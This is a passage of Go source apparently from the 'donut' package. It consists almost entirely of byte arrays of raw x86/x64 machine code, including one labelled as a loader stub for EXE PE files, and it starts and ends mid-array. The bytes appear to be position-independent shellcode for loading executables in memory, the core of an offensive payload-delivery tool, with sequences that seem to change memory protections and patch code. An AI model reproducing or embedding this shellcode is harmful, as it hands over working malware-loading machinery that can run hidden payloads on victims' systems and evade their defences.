873 0x8a, 0x02, 0x88, 0x01, 0x48, 0x03, 0xce, 0x48, 0x03, 0xd6, 0x48, 0x89,
874 0x4d, 0xe8, 0x48, 0x89, 0x55, 0xe0, 0x45, 0x33, 0xc9, 0x85, 0xff, 0x0f,
875 0x84, 0x20, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x74, 0x24,
876 0x58, 0x2b, 0xc3, 0x48, 0x8b, 0x5c, 0x24, 0x50, 0x48, 0x8b, 0x7c, 0x24,
877 0x60, 0x4c, 0x8b, 0x74, 0x24, 0x68, 0x48, 0x83, 0xc4, 0x40, 0x5d, 0xc3,
878 0x8b, 0x51, 0x14, 0x4c, 0x8b, 0xc1, 0x8d, 0x42, 0xff, 0x89, 0x41, 0x14,
879 0x85, 0xd2, 0x75, 0x17, 0x48, 0x8b, 0x01, 0x0f, 0xb6, 0x10, 0x48, 0xff,
880 0xc0, 0x48, 0x89, 0x01, 0x8b, 0xc2, 0xc7, 0x41, 0x14, 0x07, 0x00, 0x00,
881 0x00, 0xeb, 0x03, 0x8b, 0x41, 0x10, 0x8d, 0x0c, 0x00, 0xc1, 0xe8, 0x07,
882 0x83, 0xe0, 0x01, 0x41, 0x89, 0x48, 0x10, 0xc3, 0x4c, 0x8b, 0xc9, 0x45,
883 0x85, 0xc0, 0x74, 0x13, 0x48, 0x2b, 0xd1, 0x42, 0x8a, 0x04, 0x0a, 0x41,
884 0x88, 0x01, 0x49, 0xff, 0xc1, 0x41, 0x83, 0xc0, 0xff, 0x75, 0xf0, 0x48,
885 0x8b, 0xc1, 0xc3, 0xcc, 0x48, 0x89, 0x7c, 0x24, 0x08, 0x4c, 0x8b, 0xc9,
886 0x8a, 0xc2, 0x49, 0x8b, 0xf9, 0x41, 0x8b, 0xc8, 0xf3, 0xaa, 0x48, 0x8b,
887 0x7c, 0x24, 0x08, 0x49, 0x8b, 0xc1, 0xc3, 0xcc, 0xeb, 0x0f, 0x80, 0x3a,
888 0x00, 0x74, 0x10, 0x3a, 0x02, 0x75, 0x0c, 0x48, 0xff, 0xc1, 0x48, 0xff,
889 0xc2, 0x8a, 0x01, 0x84, 0xc0, 0x75, 0xeb, 0x0f, 0xbe, 0x01, 0x0f, 0xbe,
890 0x0a, 0x2b, 0xc1, 0xc3};
891
0 package donut
1
2 // LOADER_EXE_X86 - stub for EXE PE files
3 var LOADER_EXE_X86 = []byte{
4
5 0x81, 0xec, 0xcc, 0x02, 0x00, 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24,
6 0xdc, 0x02, 0x00, 0x00, 0x33, 0xdb, 0x57, 0x8b, 0xfb, 0x8b, 0x86, 0x38,
7 0x02, 0x00, 0x00, 0x0b, 0x86, 0x3c, 0x02, 0x00, 0x00, 0x0f, 0x84, 0xd4,
8 0x00, 0x00, 0x00, 0xff, 0x76, 0x2c, 0xff, 0x76, 0x28, 0xff, 0xb6, 0x8c,
9 0x00, 0x00, 0x00, 0xff, 0xb6, 0x88, 0x00, 0x00, 0x00, 0x56, 0xe8, 0xb8,
10 0x20, 0x00, 0x00, 0x8b, 0xf8, 0x83, 0xc4, 0x14, 0x85, 0xff, 0x0f, 0x84,
11 0xaa, 0x00, 0x00, 0x00, 0x53, 0x53, 0x56, 0xe8, 0x99, 0x20, 0x00, 0x00,
12 0x8b, 0xc8, 0xb8, 0x12, 0x21, 0x40, 0x00, 0x2d, 0xed, 0x30, 0x40, 0x00,
13 0x03, 0xc8, 0x51, 0x53, 0x53, 0xff, 0xd7, 0xff, 0x76, 0x2c, 0x8b, 0xf8,
14 0xff, 0x76, 0x28, 0xff, 0xb6, 0xac, 0x01, 0x00, 0x00, 0xff, 0xb6, 0xa8,
15 0x01, 0x00, 0x00, 0x56, 0xe8, 0x76, 0x20, 0x00, 0x00, 0xff, 0x76, 0x2c,
16 0x8b, 0xe8, 0xff, 0x76, 0x28, 0xff, 0xb6, 0x94, 0x00, 0x00, 0x00, 0xff,
17 0xb6, 0x90, 0x00, 0x00, 0x00, 0x56, 0xe8, 0x5c, 0x20, 0x00, 0x00, 0xff,
18 0x76, 0x2c, 0x8b, 0xd8, 0xff, 0x76, 0x28, 0xff, 0xb6, 0x9c, 0x00, 0x00,
19 0x00, 0xff, 0xb6, 0x98, 0x00, 0x00, 0x00, 0x56, 0xe8, 0x42, 0x20, 0x00,
20 0x00, 0x83, 0xc4, 0x3c, 0x85, 0xed, 0x74, 0x46, 0x85, 0xdb, 0x74, 0x42,
21 0x85, 0xc0, 0x74, 0x3e, 0x8d, 0x4c, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x10,
22 0x07, 0x00, 0x01, 0x00, 0x51, 0xff, 0xd0, 0x50, 0xff, 0xd3, 0x8b, 0x86,
23 0x38, 0x02, 0x00, 0x00, 0x83, 0xa4, 0x24, 0xd4, 0x00, 0x00, 0x00, 0xfc,
24 0x89, 0x84, 0x24, 0xc8, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x10, 0x6a,
25 0x00, 0x50, 0xff, 0xd5, 0xeb, 0x0c, 0x83, 0xc8, 0xff, 0xeb, 0x09, 0x56,
26 0xe8, 0x11, 0x10, 0x00, 0x00, 0x59, 0x8b, 0xc7, 0x5f, 0x5e, 0x5d, 0x5b,
27 0x81, 0xc4, 0xcc, 0x02, 0x00, 0x00, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x83,
28 0xc0, 0x04, 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04, 0x00, 0xb8, 0x01,
29 0x40, 0x00, 0x80, 0xc2, 0x08, 0x00, 0x56, 0x57, 0xe8, 0xc0, 0x1f, 0x00,
30 0x00, 0x8b, 0x74, 0x24, 0x10, 0xb9, 0x9d, 0x11, 0x40, 0x00, 0xbf, 0xed,
31 0x30, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x08, 0xe8,
32 0xa5, 0x1f, 0x00, 0x00, 0xb9, 0x0f, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
33 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x04, 0xe8, 0x92, 0x1f, 0x00, 0x00, 0xb9,
34 0xfc, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
35 0x08, 0xe8, 0x7f, 0x1f, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b,
36 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x0c, 0xe8, 0x6c, 0x1f, 0x00,
37 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
38 0x5f, 0x89, 0x48, 0x10, 0x8b, 0x44, 0x24, 0x08, 0x83, 0x66, 0x04, 0x00,
39 0x89, 0x46, 0x08, 0x5e, 0xc3, 0x8b, 0x4c, 0x24, 0x0c, 0x85, 0xc9, 0x75,
40 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x4d, 0x53, 0x8b, 0x5c, 0x24,
41 0x0c, 0x33, 0xd2, 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x8b, 0x7e, 0x08,
42 0x8b, 0x84, 0x97, 0xf4, 0x05, 0x00, 0x00, 0x3b, 0x04, 0x93, 0x75, 0x08,
43 0x42, 0x83, 0xfa, 0x04, 0x75, 0xee, 0xeb, 0x14, 0x33, 0xd2, 0x8b, 0x84,
44 0x97, 0xb4, 0x06, 0x00, 0x00, 0x3b, 0x04, 0x93, 0x75, 0x10, 0x42, 0x83,
45 0xfa, 0x04, 0x75, 0xee, 0x89, 0x31, 0xf0, 0xff, 0x46, 0x04, 0x33, 0xc0,
46 0xeb, 0x08, 0x83, 0x21, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x5f, 0x5e,
47 0x5b, 0xc2, 0x0c, 0x00, 0x8b, 0x4c, 0x24, 0x04, 0x83, 0xc8, 0xff, 0xf0,
48 0x0f, 0xc1, 0x41, 0x04, 0x48, 0xc2, 0x04, 0x00, 0x33, 0xc0, 0xc2, 0x08,
49 0x00, 0x55, 0x8b, 0xec, 0xf6, 0x45, 0x10, 0x02, 0x56, 0x8b, 0x75, 0x08,
50 0x57, 0x74, 0x15, 0x8b, 0x7d, 0x18, 0x85, 0xff, 0x74, 0x1b, 0x8b, 0x46,
51 0x1c, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x04, 0x8b, 0x46, 0x1c, 0x89, 0x07,
52 0xf6, 0x45, 0x10, 0x01, 0x74, 0x19, 0x8b, 0x7d, 0x14, 0x85, 0xff, 0x75,
53 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x0d, 0x83, 0xc6, 0x14, 0x56,
54 0x8b, 0x06, 0xff, 0x50, 0x04, 0x89, 0x37, 0x33, 0xc0, 0x5f, 0x5e, 0x5d,
55 0xc2, 0x14, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x8b, 0x40, 0x2c, 0xff, 0x50,
56 0x54, 0x8b, 0x4c, 0x24, 0x08, 0x89, 0x01, 0x33, 0xc0, 0xc2, 0x08, 0x00,
57 0x56, 0x57, 0xe8, 0x76, 0x1e, 0x00, 0x00, 0x8b, 0x74, 0x24, 0x10, 0xb9,
58 0xae, 0x13, 0x40, 0x00, 0xbf, 0xed, 0x30, 0x40, 0x00, 0x2b, 0xcf, 0x03,
59 0xc8, 0x8b, 0x06, 0x89, 0x08, 0xe8, 0x5b, 0x1e, 0x00, 0x00, 0xb9, 0x0f,
60 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x04,
61 0xe8, 0x48, 0x1e, 0x00, 0x00, 0xb9, 0xfc, 0x11, 0x40, 0x00, 0x2b, 0xcf,
62 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x08, 0xe8, 0x35, 0x1e, 0x00, 0x00,
63 0xb9, 0x5b, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
64 0x48, 0x0c, 0xe8, 0x22, 0x1e, 0x00, 0x00, 0xb9, 0x11, 0x12, 0x40, 0x00,
65 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x10, 0xe8, 0x0f, 0x1e,
66 0x00, 0x00, 0xb9, 0x0c, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
67 0x06, 0x89, 0x48, 0x14, 0xe8, 0xfc, 0x1d, 0x00, 0x00, 0xb9, 0xa9, 0x13,
68 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x18, 0xe8,
69 0xe9, 0x1d, 0x00, 0x00, 0xb9, 0x0c, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03,
70 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x1c, 0xe8, 0xd6, 0x1d, 0x00, 0x00, 0xb9,
71 0x5e, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
72 0x20, 0xe8, 0xc3, 0x1d, 0x00, 0x00, 0xb9, 0x59, 0x13, 0x40, 0x00, 0x2b,
73 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x24, 0xe8, 0xb0, 0x1d, 0x00,
74 0x00, 0xb9, 0x59, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
75 0x5f, 0x89, 0x48, 0x28, 0x8b, 0x44, 0x24, 0x08, 0x83, 0x66, 0x04, 0x00,
76 0x89, 0x46, 0x2c, 0x5e, 0xc3, 0x33, 0xc0, 0xc2, 0x04, 0x00, 0x55, 0x8b,
77 0xec, 0x83, 0xec, 0x2c, 0x33, 0xc0, 0x56, 0x6a, 0x20, 0x50, 0x89, 0x45,
78 0xf4, 0x89, 0x45, 0xf8, 0x89, 0x45, 0xfc, 0x8d, 0x45, 0xd4, 0x50, 0xe8,
79 0x02, 0x22, 0x00, 0x00, 0x8b, 0x75, 0x0c, 0x8d, 0x4d, 0xd4, 0x83, 0xc4,
80 0x0c, 0x8b, 0x06, 0x51, 0x56, 0xff, 0x50, 0x0c, 0x85, 0xc0, 0x75, 0x12,
81 0x8b, 0x06, 0x8d, 0x4d, 0xfc, 0x51, 0x8d, 0x4d, 0xf8, 0x51, 0x8d, 0x4d,
82 0xf4, 0x51, 0x56, 0xff, 0x50, 0x10, 0x33, 0xc0, 0x5e, 0xc9, 0xc2, 0x08,
83 0x00, 0x33, 0xc0, 0xc2, 0x0c, 0x00, 0x8b, 0x4c, 0x24, 0x0c, 0x85, 0xc9,
84 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x6c, 0x8b, 0x54, 0x24,
85 0x04, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x56, 0x57, 0x8b, 0x7a, 0x2c, 0x33,
86 0xf6, 0x8b, 0x84, 0xb7, 0xf4, 0x05, 0x00, 0x00, 0x3b, 0x04, 0xb3, 0x75,
87 0x08, 0x46, 0x83, 0xfe, 0x04, 0x75, 0xee, 0xeb, 0x14, 0x33, 0xf6, 0x8b,
88 0x84, 0xb7, 0xa4, 0x06, 0x00, 0x00, 0x3b, 0x04, 0xb3, 0x75, 0x0e, 0x46,
89 0x83, 0xfe, 0x04, 0x75, 0xee, 0x89, 0x11, 0xf0, 0xff, 0x42, 0x04, 0xeb,
90 0x1d, 0x33, 0xf6, 0x8b, 0x84, 0xb7, 0xb4, 0x06, 0x00, 0x00, 0x3b, 0x04,
91 0xb3, 0x75, 0x13, 0x46, 0x83, 0xfe, 0x04, 0x75, 0xee, 0x8d, 0x42, 0x08,
92 0x89, 0x01, 0xf0, 0xff, 0x42, 0x0c, 0x33, 0xc0, 0xeb, 0x08, 0x83, 0x21,
93 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x5f, 0x5e, 0x5b, 0xc2, 0x0c, 0x00,
94 0x8b, 0x44, 0x24, 0x18, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2, 0x18, 0x00,
95 0x8b, 0x44, 0x24, 0x04, 0x0f, 0xaf, 0x44, 0x24, 0x08, 0xc3, 0x8b, 0x44,
96 0x24, 0x14, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2, 0x14, 0x00, 0x8b, 0x44,
97 0x24, 0x04, 0x03, 0x44, 0x24, 0x08, 0xc3, 0x51, 0x53, 0x56, 0x8b, 0x74,
98 0x24, 0x10, 0x8d, 0x86, 0x58, 0x03, 0x00, 0x00, 0x50, 0xff, 0x56, 0x30,
99 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9, 0xc5, 0x00, 0x00, 0x00,
100 0x55, 0x57, 0x8d, 0x86, 0xc0, 0x05, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56,
101 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa, 0x00, 0x00, 0x00, 0xbf,
102 0x38, 0x14, 0x40, 0x00, 0x81, 0xef, 0x2c, 0x14, 0x40, 0x00, 0x0f, 0x88,
103 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57,
104 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x85, 0x00, 0x00, 0x00,
105 0x57, 0xe8, 0x37, 0x1c, 0x00, 0x00, 0xb9, 0x2c, 0x14, 0x40, 0x00, 0x81,
106 0xe9, 0xed, 0x30, 0x40, 0x00, 0x03, 0xc1, 0x50, 0x55, 0xe8, 0x90, 0x20,
107 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50, 0xff, 0x74,
108 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d, 0x86, 0xd0, 0x05, 0x00,
109 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x74, 0x49,
110 0xbf, 0x4e, 0x14, 0x40, 0x00, 0xbb, 0x42, 0x14, 0x40, 0x00, 0x2b, 0xfb,
111 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57, 0x55, 0xff,
112 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0xdd, 0x1b, 0x00, 0x00,
113 0x81, 0xeb, 0xed, 0x30, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55, 0xe8, 0x3b,
114 0x20, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50, 0xff,
115 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x33, 0xc0, 0x40, 0xeb,
116 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, 0xc3, 0x51, 0x53, 0x56,
117 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x64, 0x03, 0x00, 0x00, 0x50, 0xff,
118 0x56, 0x30, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9, 0xc5, 0x00,
119 0x00, 0x00, 0x55, 0x57, 0x8d, 0x86, 0x70, 0x05, 0x00, 0x00, 0x50, 0x53,
120 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa, 0x00, 0x00,
121 0x00, 0xbf, 0xc8, 0x30, 0x40, 0x00, 0x81, 0xef, 0xa9, 0x13, 0x40, 0x00,
122 0x0f, 0x88, 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a,
123 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x85, 0x00,
124 0x00, 0x00, 0x57, 0xe8, 0x51, 0x1b, 0x00, 0x00, 0xb9, 0xa9, 0x13, 0x40,
125 0x00, 0x81, 0xe9, 0xed, 0x30, 0x40, 0x00, 0x03, 0xc1, 0x50, 0x55, 0xe8,
126 0xaa, 0x1f, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50,
127 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d, 0x86, 0x90,
128 0x05, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed,
129 0x74, 0x49, 0xbf, 0xbf, 0x30, 0x40, 0x00, 0xbb, 0xb0, 0x30, 0x40, 0x00,
130 0x2b, 0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57,
131 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0xf7, 0x1a,
132 0x00, 0x00, 0x81, 0xeb, 0xed, 0x30, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55,
133 0xe8, 0x55, 0x1f, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10,
134 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x33, 0xc0,
135 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, 0xc3, 0x81,
136 0xec, 0x58, 0x02, 0x00, 0x00, 0x53, 0x56, 0x57, 0x6a, 0x3c, 0x5e, 0x33,
137 0xff, 0x8d, 0x44, 0x24, 0x28, 0x56, 0x57, 0x50, 0x89, 0x7c, 0x24, 0x1c,
138 0xbb, 0x00, 0x02, 0x60, 0x84, 0xe8, 0x38, 0x1f, 0x00, 0x00, 0x8d, 0x44,
139 0x24, 0x70, 0x89, 0x74, 0x24, 0x34, 0x8b, 0xb4, 0x24, 0x74, 0x02, 0x00,
140 0x00, 0x83, 0xc4, 0x0c, 0x89, 0x44, 0x24, 0x38, 0x8d, 0x84, 0x24, 0x64,
141 0x01, 0x00, 0x00, 0x89, 0x44, 0x24, 0x54, 0xb8, 0x00, 0x01, 0x00, 0x00,
142 0x89, 0x44, 0x24, 0x3c, 0x89, 0x44, 0x24, 0x58, 0x8d, 0x44, 0x24, 0x28,
143 0x50, 0x68, 0x00, 0x00, 0x00, 0x10, 0x57, 0x8d, 0x86, 0xe8, 0x06, 0x00,
144 0x00, 0x50, 0xff, 0x96, 0x90, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84,
145 0xac, 0x01, 0x00, 0x00, 0x33, 0xc0, 0x83, 0x7c, 0x24, 0x34, 0x04, 0x57,
146 0x57, 0x0f, 0x94, 0xc0, 0x57, 0x89, 0x44, 0x24, 0x20, 0xb8, 0x00, 0x32,
147 0xe0, 0x84, 0x57, 0x57, 0x0f, 0x44, 0xd8, 0xff, 0x96, 0x94, 0x00, 0x00,
148 0x00, 0x89, 0x44, 0x24, 0x24, 0x85, 0xc0, 0x0f, 0x84, 0x7f, 0x01, 0x00,
149 0x00, 0x57, 0x57, 0x6a, 0x03, 0x57, 0x57, 0xff, 0x74, 0x24, 0x54, 0x8d,
150 0x4c, 0x24, 0x7c, 0x51, 0x50, 0xff, 0x96, 0x98, 0x00, 0x00, 0x00, 0x8b,
151 0xc8, 0x89, 0x4c, 0x24, 0x20, 0x85, 0xc9, 0x0f, 0x84, 0xfb, 0x00, 0x00,
152 0x00, 0x55, 0x57, 0x53, 0x57, 0x57, 0x57, 0x8d, 0x84, 0x24, 0x7c, 0x01,
153 0x00, 0x00, 0x50, 0x8d, 0x86, 0xe8, 0x07, 0x00, 0x00, 0x50, 0x51, 0xff,
154 0x96, 0xa8, 0x00, 0x00, 0x00, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xca,
155 0x00, 0x00, 0x00, 0x39, 0x7c, 0x24, 0x18, 0x74, 0x20, 0xf7, 0xc3, 0x00,
156 0x10, 0x00, 0x00, 0x74, 0x18, 0x6a, 0x04, 0x8d, 0x44, 0x24, 0x20, 0xc7,
157 0x44, 0x24, 0x20, 0x80, 0x33, 0x00, 0x00, 0x50, 0x6a, 0x1f, 0x55, 0xff,
158 0x96, 0x9c, 0x00, 0x00, 0x00, 0x57, 0x57, 0x57, 0x57, 0x55, 0xff, 0x96,
159 0xac, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x8a, 0x00, 0x00, 0x00,
160 0x57, 0x8d, 0x44, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00, 0x00,
161 0x00, 0x50, 0x8d, 0x44, 0x24, 0x1c, 0x50, 0x68, 0x13, 0x00, 0x00, 0x20,
162 0x55, 0xff, 0x96, 0xb0, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x67, 0x81,
163 0x7c, 0x24, 0x14, 0xc8, 0x00, 0x00, 0x00, 0x75, 0x5d, 0x57, 0x8d, 0x44,
164 0x24, 0x14, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00, 0x00, 0x00, 0x50, 0x8d,
165 0x9e, 0x18, 0x09, 0x00, 0x00, 0x53, 0x68, 0x05, 0x00, 0x00, 0x20, 0x55,
166 0x89, 0x3b, 0x89, 0x7b, 0x04, 0xff, 0x96, 0xb0, 0x00, 0x00, 0x00, 0x85,
167 0xc0, 0x74, 0x33, 0x8b, 0x03, 0x0b, 0x43, 0x04, 0x74, 0x2c, 0x6a, 0x04,
168 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x33, 0x57, 0xff, 0x56, 0x3c, 0x89,
169 0x86, 0x20, 0x09, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x15, 0x8d, 0x4c, 0x24,
170 0x20, 0x89, 0x7c, 0x24, 0x20, 0x51, 0xff, 0x33, 0x50, 0x55, 0xff, 0x96,
171 0xa0, 0x00, 0x00, 0x00, 0x8b, 0xf8, 0x55, 0xff, 0x96, 0xa4, 0x00, 0x00,
172 0x00, 0xff, 0x74, 0x24, 0x24, 0xff, 0x96, 0xa4, 0x00, 0x00, 0x00, 0x5d,
173 0xff, 0x74, 0x24, 0x24, 0xff, 0x96, 0xa4, 0x00, 0x00, 0x00, 0x85, 0xff,
174 0x74, 0x4e, 0x83, 0xbe, 0x34, 0x02, 0x00, 0x00, 0x03, 0x75, 0x45, 0xff,
175 0xb6, 0x18, 0x09, 0x00, 0x00, 0x8b, 0x9e, 0x20, 0x09, 0x00, 0x00, 0x8d,
176 0x86, 0x08, 0x09, 0x00, 0x00, 0x53, 0x50, 0x8d, 0x86, 0xf8, 0x08, 0x00,
177 0x00, 0x50, 0xe8, 0x48, 0x1a, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8d, 0x86,
178 0xf0, 0x07, 0x00, 0x00, 0xff, 0x76, 0x28, 0x50, 0xe8, 0x11, 0x19, 0x00,
179 0x00, 0x83, 0xc4, 0x1c, 0x3b, 0x83, 0x18, 0x05, 0x00, 0x00, 0x75, 0x0c,
180 0x3b, 0x93, 0x1c, 0x05, 0x00, 0x00, 0x75, 0x04, 0x8b, 0xc7, 0xeb, 0x02,
181 0x33, 0xc0, 0x5f, 0x5e, 0x5b, 0x81, 0xc4, 0x58, 0x02, 0x00, 0x00, 0xc3,
182 0x81, 0xec, 0xdc, 0x01, 0x00, 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24,
183 0xf0, 0x01, 0x00, 0x00, 0x57, 0x8b, 0x6e, 0x3c, 0x8b, 0x44, 0x2e, 0x78,
184 0x85, 0xc0, 0x0f, 0x84, 0xe5, 0x00, 0x00, 0x00, 0x8d, 0x3c, 0x30, 0x8b,
185 0x5f, 0x18, 0x85, 0xdb, 0x0f, 0x84, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x47,
186 0x1c, 0x33, 0xd2, 0x03, 0xc6, 0x89, 0x54, 0x24, 0x10, 0x89, 0x44, 0x24,
187 0x24, 0x8b, 0x47, 0x20, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x14, 0x8b, 0x47,
188 0x24, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x20, 0x8b, 0x47, 0x0c, 0x03, 0xc6,
189 0x8a, 0x08, 0x84, 0xc9, 0x74, 0x2a, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x94,
190 0x24, 0xe8, 0x00, 0x00, 0x00, 0x2b, 0xd0, 0x80, 0xc9, 0x20, 0x46, 0x88,
191 0x0c, 0x02, 0x40, 0x8a, 0x08, 0x84, 0xc9, 0x75, 0xf2, 0x89, 0x74, 0x24,
192 0x10, 0x8b, 0xb4, 0x24, 0xf4, 0x01, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x10,
193 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x8d, 0x84, 0x24, 0xec, 0x00,
194 0x00, 0x00, 0xc6, 0x84, 0x14, 0xec, 0x00, 0x00, 0x00, 0x00, 0xff, 0xb4,
195 0x24, 0x04, 0x02, 0x00, 0x00, 0x50, 0xe8, 0x47, 0x18, 0x00, 0x00, 0x89,
196 0x44, 0x24, 0x24, 0x83, 0xc4, 0x0c, 0x8b, 0x44, 0x24, 0x14, 0x83, 0xc0,
197 0xfc, 0x89, 0x54, 0x24, 0x1c, 0x8d, 0x04, 0x98, 0x89, 0x44, 0x24, 0x10,
198 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x8b, 0x08, 0xff, 0xb4, 0x24,
199 0x04, 0x02, 0x00, 0x00, 0x03, 0xce, 0x51, 0xe8, 0x16, 0x18, 0x00, 0x00,
200 0x33, 0x44, 0x24, 0x24, 0x83, 0xc4, 0x0c, 0x33, 0x54, 0x24, 0x1c, 0x3b,
201 0x84, 0x24, 0xf8, 0x01, 0x00, 0x00, 0x75, 0x09, 0x3b, 0x94, 0x24, 0xfc,
202 0x01, 0x00, 0x00, 0x74, 0x1d, 0x8b, 0x44, 0x24, 0x10, 0x83, 0xe8, 0x04,
203 0x89, 0x44, 0x24, 0x10, 0x83, 0xeb, 0x01, 0x75, 0xbb, 0x33, 0xc0, 0x5f,
204 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xdc, 0x01, 0x00, 0x00, 0xc3, 0x8b, 0x44,
205 0x24, 0x20, 0x8b, 0x4c, 0x24, 0x24, 0x0f, 0xb7, 0x44, 0x58, 0xfe, 0x8b,
206 0x0c, 0x81, 0x03, 0xce, 0x3b, 0xcf, 0x72, 0x7d, 0x8b, 0x44, 0x2e, 0x7c,
207 0x03, 0xc7, 0x3b, 0xc8, 0x73, 0x73, 0x33, 0xd2, 0x38, 0x11, 0x74, 0x1e,
208 0x8d, 0x7c, 0x24, 0x28, 0x8b, 0xf1, 0x2b, 0xf9, 0x83, 0xfa, 0x3c, 0x73,
209 0x11, 0x8a, 0x06, 0x88, 0x04, 0x37, 0x80, 0x3e, 0x2e, 0x74, 0x07, 0x42,
210 0x46, 0x80, 0x3e, 0x00, 0x75, 0xea, 0xc7, 0x44, 0x14, 0x29, 0x64, 0x6c,
211 0x6c, 0x00, 0x42, 0x03, 0xca, 0x33, 0xd2, 0x38, 0x11, 0x74, 0x17, 0x8d,
212 0x74, 0x24, 0x68, 0x2b, 0xf1, 0x83, 0xfa, 0x7f, 0x73, 0x0c, 0x8a, 0x01,
213 0x42, 0x88, 0x04, 0x0e, 0x41, 0x80, 0x39, 0x00, 0x75, 0xef, 0x8b, 0xb4,
